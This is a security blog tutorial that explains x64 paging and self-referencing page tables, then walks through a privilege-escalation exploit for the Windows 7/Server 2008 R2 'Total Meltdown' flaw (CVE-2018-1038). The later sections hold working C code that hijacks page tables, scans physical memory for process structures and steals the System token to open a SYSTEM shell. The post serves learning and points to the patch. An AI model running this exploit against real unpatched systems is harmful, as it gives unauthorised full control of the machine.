Exploiting CVE-2018-1038 - Total Meltdown

Back in March, Ulf Frisk disclosed a vulnerability in Windows 7 and Server 2008 R2.

The vulnerability is pretty awesome: a patch released by Microsoft to mitigate the Meltdown vulnerability inadvertently opened up a hole in these versions of Windows, allowing any process to access and modify page table entries.

The writeup of the vulnerability can be found over on Ulf’s blog here, and is well worth a read.

This week I had some free time, so I decided to dig into the vulnerability and see just how the issue manifested itself. The aim was to create a quick exploit which could be used to elevate privileges during an assessment. I ended up delving into Windows memory management more than I had before, so this post was created to walk through just how an exploit can be crafted for this kind of vulnerability.

As always, this post is for people looking to learn about exploitation techniques rather than simply providing a ready to fire exploit. With that said, let’s start with some paging fundamentals.

Paging fundamentals

To understand the workings of this vulnerability, we first need to cover some of the fundamentals of how paging works on the x86/x64 architecture.



As we all know, a virtual address on an x64 OS usually looks something like:

0x7fffffd6001

Unbeknown to some, however, the virtual address is not just a pointer to an arbitrary location in RAM… it is actually made up of a number of fields, each with a specific purpose when translating virtual addresses to physical addresses.

Let’s start by converting the above virtual memory address into binary:

0000000000000000 000001111 111111111 111111111 111010110 000000000001

Working left to right, we can first disregard the top 16 bits, as they play no part in translation: they are simply set to mirror bit 47 (the 48th bit) of the virtual address.

The remaining 48 bits, working down from bit 47, break down as follows:

- The first 9 bits, 000001111 (15 in decimal), are an index into the PML4 table.

- The next 9 bits, 111111111 (511 in decimal), are an index into the PDPT.

- The next 9 bits, 111111111 (511 in decimal), are an index into the PD.

- The next 9 bits, 111010110 (470 in decimal), are an index into the PT.

- Finally, the 12 bits 000000000001 (1 in decimal) are an offset into a page of memory.
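To double-check the breakdown above, here is a small Go sketch in the same spirit as the Go code later in this post. The helper names binaryFields and isCanonical are my own (not from any library): binaryFields prints the same bit groups as the binary string above, and isCanonical checks the rule that bits 48-63 must be copies of bit 47.

```go
package main

import "fmt"

// binaryFields splits a 64-bit virtual address into the groups used by
// 4-level paging: 16 sign-extension bits, four 9-bit table indices and a
// 12-bit page offset.
func binaryFields(va uint64) string {
	return fmt.Sprintf("%016b %09b %09b %09b %09b %012b",
		va>>48,         // bits 48-63: must mirror bit 47
		(va>>39)&0x1FF, // PML4 index
		(va>>30)&0x1FF, // PDPT index
		(va>>21)&0x1FF, // PD index
		(va>>12)&0x1FF, // PT index
		va&0xFFF,       // offset into the 4 KiB page
	)
}

// isCanonical reports whether bits 48-63 are all copies of bit 47.
func isCanonical(va uint64) bool {
	top := va >> 47 // bit 47 plus the 16 bits above it
	return top == 0 || top == 0x1FFFF
}

func main() {
	va := uint64(0x7fffffd6001)
	fmt.Println(binaryFields(va))
	fmt.Println(isCanonical(va))
}
```

For 0x7fffffd6001 this prints the same binary string shown above, followed by true.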

Of course, the next question to ask is… just what are PML4, PDPT, PD, and PT!!

PML4, PDPT, PD and PT

In x64 architecture, translating virtual addresses to physical addresses is done using a hierarchy of four paging tables, the first of which (PML4) is pointed to by the CR3 register:

- PML4 - Page Map Level 4

- PDPT - Page Directory Pointer Table

- PD - Page Directory

- PT - Page Table

Each table entry provides both a physical address (of the next table in the chain, or ultimately of where our data is stored) and flags associated with that memory.

For example, a page table entry can provide a pointer to the next table in the lookup chain, set the NX bit on a page of memory, or ensure that kernel memory is not accessible to applications running on the OS.

Simplified, the above virtual address lookup would flow through the tables like this:

Here we see that the process of traversing these tables is completed by each entry providing a pointer to the next table, with the final entry ultimately pointing to a physical address in memory where data is stored.
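The same walk can be sketched in Go against a toy model of physical memory. Everything here is an assumption for illustration: physMem, walk and demoTables are hypothetical names, the table locations (0x1000 to 0x4000) and the data page (0x9000) are made up, and large pages are ignored. The indices wired into demoTables are the ones derived above for 0x7fffffd6001.

```go
package main

import "fmt"

// physMem is a toy stand-in for physical memory: each key is the physical
// address of a 4 KiB page holding one table of 512 64-bit entries.
type physMem map[uint64]*[512]uint64

const (
	presentBit = 1 << 0
	addrMask   = 0x000FFFFFFFFFF000 // bits 12-51 of an entry hold a physical address
)

// walk follows CR3 -> PML4 -> PDPT -> PD -> PT for va. Large pages
// (the PS bit) are deliberately ignored to keep the sketch short.
func walk(mem physMem, cr3, va uint64) (uint64, error) {
	table := cr3 & addrMask
	for _, shift := range []uint{39, 30, 21, 12} {
		t, ok := mem[table]
		if !ok {
			return 0, fmt.Errorf("no table at %#x", table)
		}
		entry := t[(va>>shift)&0x1FF]
		if entry&presentBit == 0 {
			return 0, fmt.Errorf("entry not present (index bits at %d)", shift)
		}
		table = entry & addrMask // next table, or the final data page
	}
	return table | va&0xFFF, nil
}

// demoTables maps the page containing 0x7fffffd6001 to physical page 0x9000.
func demoTables() physMem {
	mem := physMem{}
	for _, pa := range []uint64{0x1000, 0x2000, 0x3000, 0x4000} {
		mem[pa] = new([512]uint64)
	}
	mem[0x1000][15] = 0x2000 | presentBit  // PML4[15]  -> PDPT
	mem[0x2000][511] = 0x3000 | presentBit // PDPT[511] -> PD
	mem[0x3000][511] = 0x4000 | presentBit // PD[511]   -> PT
	mem[0x4000][470] = 0x9000 | presentBit // PT[470]   -> data page
	return mem
}

func main() {
	pa, err := walk(demoTables(), 0x1000, 0x7fffffd6001)
	fmt.Printf("%#x %v\n", pa, err)
}
```

Running it prints 0x9001 <nil>: the last entry supplies the physical page, and the low 12 bits of the virtual address are added as the offset.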

As you can imagine, storing and managing page tables for each process on an OS can take a lot of effort. One trick used by OS developers to ease this process is a technique called “Self-Referencing Page Tables”.

Self-Referencing Page Tables

Put simply, Self-Referencing Page Tables work by utilising an entry in the PML4 table which references the PML4 table itself. For example, if we create a new entry in the PML4 table at index 0x100, and the entry points back to the PML4 table’s physical address, we have what is called a “Self-Referencing Entry”.

So why would anyone do this? Well, this actually gives us a set of virtual addresses where we can reference and modify any of the page tables in our virtual address space.

For example, if we want to modify the PML4 table for our process, we can simply reference the virtual address 0xffff804020100000 (0x804020100000 with bit 47 sign-extended into the top 16 bits), which translates to:

- PML4 index 0x100 - Physical address of PML4

- PDPT index 0x100 - Again, physical address of PML4

- PD index 0x100 - Again.. physical address of PML4

- PT index 0x100 - Again…… physical address of PML4

Which ultimately returns the memory of… PML4.

Hopefully this gives you an idea of the power of the recursive nature of self-referencing page tables… believe me, it took a few evenings staring at the screen to get my head around that :D

Using the below code as a further example, we can see that a virtual address of 0xffff804020100000 allows us to retrieve the PML4 table for editing, where index 0x100 of PML4 is a self-reference.

```go
package main

import "fmt"

// VAtoOffsets splits a virtual address into its four table indices and page offset.
func VAtoOffsets(va uint64) {
	phy_offset := va & 0xFFF
	pt_index := (va >> 12) & 0x1FF
	pde_index := (va >> (12 + 9)) & 0x1FF
	pdpt_index := (va >> (12 + 9 + 9)) & 0x1FF
	pml4_index := (va >> (12 + 9 + 9 + 9)) & 0x1FF

	fmt.Printf("PML4 Index: %03x\n", pml4_index)
	fmt.Printf("PDPT Index: %03x\n", pdpt_index)
	fmt.Printf("PDE Index: %03x\n", pde_index)
	fmt.Printf("PT Index: %03x\n", pt_index)
	fmt.Printf("Page offset: %03x\n", phy_offset)
}

// OffsetsToVA rebuilds a canonical virtual address from the indices and page offset.
func OffsetsToVA(phy_offset, pt_index, pde_index, pdpt_index, pml4_index uint64) {
	var va uint64
	va = pml4_index << (12 + 9 + 9 + 9)
	va = va | pdpt_index<<(12+9+9)
	va = va | pde_index<<(12+9)
	va = va | pt_index<<12
	va = va | phy_offset

	// Sign-extend bit 47 into bits 48-63 so the address is canonical
	if va&0x800000000000 == 0x800000000000 {
		va |= 0xFFFF000000000000
	}

	fmt.Printf("Virtual Address: %x\n", va)
}

func main() {
	VAtoOffsets(0xffff804020100000)
	OffsetsToVA(0, 0x100, 0x100, 0x100, 0x100)
}
```

You can run this code in a browser to see the results: https://play.golang.org/p/tyQUoox47ri

Now, let’s say we want to modify the PDPT entry of a virtual address. Using the self-referencing technique this becomes simple: we just reduce the number of times that we recurse through the self-referencing entry.

For example, given a PML4 index of 0x150, and our self-referencing entry at index 0x100, we can reach the corresponding PDPT table at the address 0xffff804020150000. Again our golang application can help to illustrate just how this is the case: https://play.golang.org/p/f02hYYFgmWo.
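The pattern generalises: each index we drop from the front of the path is replaced by one more trip through the self-referencing entry. The Go sketch below uses a hypothetical helper, tableVA (not part of Windows or PCILeech), that builds these addresses for any self-reference index and reproduces both addresses above. Plugging in 0x1ed, the self-referencing index that Windows 7 x64 uses, gives 0xfffff6fb7dbed000 for the PML4 itself. tableVA(0x1ed, 0x100) gives 0xFFFFF6FB7DA00000 + 0x100000, the value that appears in the exploit comments later on.

```go
package main

import "fmt"

// tableVA returns the virtual address through which a paging table can be
// read or written when PML4 entry selfRef points back at the PML4 itself.
// path lists the indices leading to the wanted table:
//   no indices     -> the PML4
//   pml4           -> that entry's PDPT
//   pml4, pdpt     -> a PD
//   pml4, pdpt, pd -> a PT
// Each index missing from path is replaced by one extra pass through selfRef.
func tableVA(selfRef uint64, path ...uint64) uint64 {
	if len(path) > 3 {
		panic("tableVA: at most three indices")
	}
	idx := make([]uint64, 0, 4)
	for len(idx) < 4-len(path) {
		idx = append(idx, selfRef)
	}
	idx = append(idx, path...)

	var va uint64
	for level, i := range idx {
		va |= (i & 0x1FF) << (39 - 9*uint(level)) // shifts 39, 30, 21, 12
	}
	if va&(1<<47) != 0 {
		va |= 0xFFFF000000000000 // keep the address canonical
	}
	return va
}

func main() {
	fmt.Printf("%#x\n", tableVA(0x100))        // PML4 via self-reference 0x100
	fmt.Printf("%#x\n", tableVA(0x100, 0x150)) // PDPT behind PML4[0x150]
	fmt.Printf("%#x\n", tableVA(0x1ed))        // PML4 via self-reference 0x1ed
}
```

This prints 0xffff804020100000, 0xffff804020150000 and 0xfffff6fb7dbed000.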

The bug

OK, so now we understand the fundamentals, we can move on to the vulnerability.

If we apply the 2018-02 security update to Windows 7 x64 or Server 2008 R2 x64, we find that PML4 entry 0x1ed has been modified.

On my vulnerable lab instance, PML4’s entry 0x1ed appears similar to this:

000000002d282867

Here we have a number of flags, however what we should pay attention to is the third bit of this page table entry (bit 2 when counting from zero, the User/Supervisor flag). If set, this bit allows access to the page of memory from user-mode, rather than access being restricted to the kernel… :O

Worse, PML4 entry 0x1ed is used as the Self-Referencing Entry in Windows 7 and Server 2008 R2 x64, meaning that any user-mode process is granted access to view and modify the PML4 page table.

And as we now know, by modifying this top level page table, we actually have the ability to view and modify all physical memory on the system… ¯\_(ツ)_/¯
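To make the flag discussion concrete, here is a minimal Go decoder for the entry shown above. decodePTE and the pte struct are illustrative names, and only the flags mentioned in this post are decoded. Bit positions follow the standard x64 paging-entry layout; bit 11 (the 0x800 in 0x867) is ignored by the processor in a PML4 entry under normal 4-level paging, so the sketch does not interpret it.

```go
package main

import "fmt"

// pte holds the x64 paging-entry fields discussed in this post.
type pte struct {
	Present, Writable, User, Accessed, Dirty, PageSize, NX bool
	Addr                                                   uint64
}

func decodePTE(e uint64) pte {
	return pte{
		Present:  e&(1<<0) != 0, // P
		Writable: e&(1<<1) != 0, // R/W
		User:     e&(1<<2) != 0, // U/S: the bit at the heart of this bug
		Accessed: e&(1<<5) != 0, // A
		Dirty:    e&(1<<6) != 0, // D
		PageSize: e&(1<<7) != 0, // PS in PDPT/PD entries (PAT in a PT entry)
		NX:       e&(1<<63) != 0,
		// Bits 12-51. For a 2 MiB PD entry, bits 12-20 are PAT/reserved
		// and are zero in the entries used in this post.
		Addr: e & 0x000FFFFFFFFFF000,
	}
}

func main() {
	fmt.Printf("%+v\n", decodePTE(0x2d282867))
}
```

Decoding 0x2d282867 shows Present, Writable and User all set, with the next table at physical address 0x2d282000. The same helper explains the magic numbers used in the exploit: 0x67 sets P, R/W, U/S, A and D, and 0xe7 additionally sets the PS bit (0x80) that turns a PD entry into a 2MB page.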

The exploit

So how do we go about exploiting this? Well, to leverage the flaw and achieve privilege escalation, our exploit will take the following steps:

- Create a new set of page tables which will allow access to any physical memory address.

- Create a set of signatures which can be used to hunt for _EPROCESS structures in kernel memory.

- Find the _EPROCESS memory address for our executing process, and for the System process.

- Replace the token of our executing process with that of System, elevating us to NT AUTHORITY\System.

Before we begin, I should mention that none of this post would have been possible without PCILeech’s code found here. As this was the first time I’d really dug into OS paging at this level, the exploit code in devicetmd.c had me awake for a few nights trying to wrap my head around just how it worked, so huge kudos to Ulf Frisk for finding the vulnerability and for PCILeech!

Rather than simply reimplementing Ulf’s paging technique, we will use the PCILeech code to set up our page table. To make things a bit easier to follow, I’ve updated a few of the magic numbers and added comments to explain just what is happening:

```c
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Self-map addresses on Windows 7 / Server 2008 R2 x64, where PML4 index 0x1ed
// is the self-referencing entry
#define PML4_BASE 0xFFFFF6FB7DBED000ULL
#define PDP_BASE  0xFFFFF6FB7DA00000ULL
#define PD_BASE   0xFFFFF6FB40000000ULL

unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;
DWORD done;

// setup: PDPT @ fixed hi-jacked physical address: 0x10000
// This code uses the PML4 Self-Reference technique discussed, and iterates until we
// find a "free" PML4 entry we can hijack.
for (iPML4 = 256; iPML4 < 512; iPML4++) {
    vaPML4e = PML4_BASE + (iPML4 << 3);
    if (*(unsigned long long *)vaPML4e) { continue; }

    // When we find an entry, we add a pointer to the next table (PDPT), which will be
    // stored at the physical address 0x10000.
    // The flags "067" allow user-mode access to the page.
    *(unsigned long long *)vaPML4e = 0x10067;
    break;
}

// Bail out rather than writing into tables we do not own (this fragment lives in main)
if (iPML4 == 512) {
    printf("[X] No free PML4 entry found\n");
    return 1;
}

printf("[*] PML4 Entry Added At Index: %llu\n", iPML4);

// Here, the PDPT table is referenced via a virtual address.
// For example, if we added our hijacked PML4 entry at index 256, this virtual address
// would be 0xFFFFF6FB7DA00000 + 0x100000
// This allows us to reference the physical address 0x10000 as:
// PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100
vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));
printf("[*] PDPT Virtual Address: %p", (void *)vaPDPT);

// 2: setup 31 PDs @ physical addresses 0x11000-0x2f000 with 2MB pages
// Below is responsible for adding 31 entries to the PDPT
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
    *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);
}

// Each of the 31 PDs is then filled with 512 entries, each mapping a 2MB large page
// (no PTs are needed). This gives access to 31 * 512 * 2MB = 31GiB (~33GB) of physical memory
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
    if ((iPDPT % 3) == 0)
        printf("\n[*] PD Virtual Addresses: ");

    vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));
    printf("%p ", (void *)vaPD);

    for (iPD = 0; iPD < 512; iPD++) {
        // Below, notice the 0xe7 flags added to each entry.
        // Its 0x80 (PS) bit creates a 2MB page rather than the standard 4096 byte page.
        *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;
    }
}

printf("\n[*] Page tables created, we now have access to ~33gb of physical memory\n");
```
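Because every PD entry written above maps a 2MB page whose physical base is ((iPDPT * 512 + iPD) << 21), the hijacked PML4 slot ends up as one linear window onto physical memory: the virtual address for physical address pa is simply the slot's base plus pa. The Go sketch below checks that arithmetic, assuming the loops run as shown (31 PDPT entries, 512 entries each) and a free slot at index 256; pdEntry and mappedVA are hypothetical helpers. This is why the scan that follows can treat exploitVM + i as physical address i, and why the mapping covers 31 GiB (roughly 33 decimal GB).

```go
package main

import "fmt"

const (
	largePage    = 1 << 21 // 2 MiB, selected by the PS bit (0x80) in a PD entry
	numPDs       = 31      // PDPT entries populated by the setup loop
	entriesPerPD = 512
)

// pdEntry mirrors the value written by the PD-filling loop:
// ((iPDPT * 512 + iPD) << 21) | 0xe7
func pdEntry(iPDPT, iPD uint64) uint64 {
	return (iPDPT*entriesPerPD+iPD)<<21 | 0xe7
}

// mappedVA composes, index by index, the virtual address that reaches
// physical address pa through the hijacked PML4 slot iPML4.
func mappedVA(iPML4, pa uint64) uint64 {
	iPDPT := pa >> 30         // which of the 31 PDs (1 GiB each)
	iPD := (pa >> 21) & 0x1FF // which 2 MiB entry inside that PD
	va := iPML4<<39 | iPDPT<<30 | iPD<<21 | pa&(largePage-1)
	if va&(1<<47) != 0 {
		va |= 0xFFFF000000000000 // canonical sign extension
	}
	return va
}

func main() {
	fmt.Printf("mapped: %d GiB\n", numPDs*entriesPerPD*largePage>>30)
	base := mappedVA(256, 0) // the exploitVM value when iPML4 is 256
	pa := uint64(0x2d282000)
	fmt.Printf("%#x %#x\n", mappedVA(256, pa), base+pa)
}
```

It prints the 31 GiB coverage, then the same virtual address twice, once built index by index and once as base plus offset.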

Now that we have our page tables set up, we need to hunt for _EPROCESS structures in physical memory. Let’s take a look at how our _EPROCESS object looks in kernel memory:

To create a simple signature, we can use the ImageFileName and PriorityClass fields, scanning through memory until we get a hit. This worked in my lab; however, if you find that you are getting false positives, you can be as granular as you like:

```c
#define EPROCESS_IMAGENAME_OFFSET 0x2e0
#define EPROCESS_TOKEN_OFFSET 0x208
#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base

unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;
// Virtual address at which the hijacked PML4 slot maps physical address 0
unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));
STARTUPINFOA si;
PROCESS_INFORMATION pi;

ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));

printf("[*] Hunting for _EPROCESS structures in memory\n");

// The bound is 31 * 512 * 2MB (~33GB), which overflows a 32-bit int, so use 64-bit arithmetic
for (unsigned long long i = 0x100000; i < 31ULL * 512 * 2097152; i++) {
    __try {
        // Locate our EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
        if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) {
            if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
                ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
                printf("[*] Found our _EPROCESS at %p\n", (void *)ourEPROCESS);
            }
        }
        // Locate the System EPROCESS via the same two fields
        else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) {
            if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
                systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
                printf("[*] Found System _EPROCESS at %p\n", (void *)systemEPROCESS);
            }
        }

        if (systemEPROCESS != 0 && ourEPROCESS != 0) {
            ...
            break;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        printf("[X] Exception occurred, stopping to avoid BSOD\n");
        break;
    }
}
```

Finally, as with most kernel privilege escalation exploits (see my previous tutorials here, here and here), we need to replace our _EPROCESS.Token field with that of the System process token:

```c
if (systemEPROCESS != 0 && ourEPROCESS != 0) {
    // Swap the tokens by copying the pointer to System Token field over our process token
    printf("[*] Copying access token from %p to %p\n",
        (void *)(systemEPROCESS + EPROCESS_TOKEN_OFFSET),
        (void *)(ourEPROCESS + EPROCESS_TOKEN_OFFSET));
    *(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) =
        *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);

    printf("[*] Done, spawning SYSTEM shell...\n\n");
    CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    break;
}
```

And as we can see in the below demo, we now have a nice way to elevate privileges on Windows 7 x64:

The final code can also be found over on Github here.

Edit: A new version of the code, which implements some memory checking, can now also be found on Github here.

The fix, and improvements

To ensure that your system is mitigated against this exploit, Microsoft have released a patch for CVE-2018-1038 here which can be deployed to remediate this issue.

If you have ever done any low-level development, you may have noticed that the above exploit code does not include further checks for device-mapped memory when searching for _EPROCESS objects. During my lab tests this didn’t show up as an issue; however, when encountering differing hardware and environments, additional checks should be added to reduce the risk of a BSOD. If you feel like tackling this, please send me your implementation and I’d be happy to update the exploit / post.

Edit: To try and reduce the chance of BSOD, I’ve implemented some additional memory checks with a second version of the POC which can be found on Github here.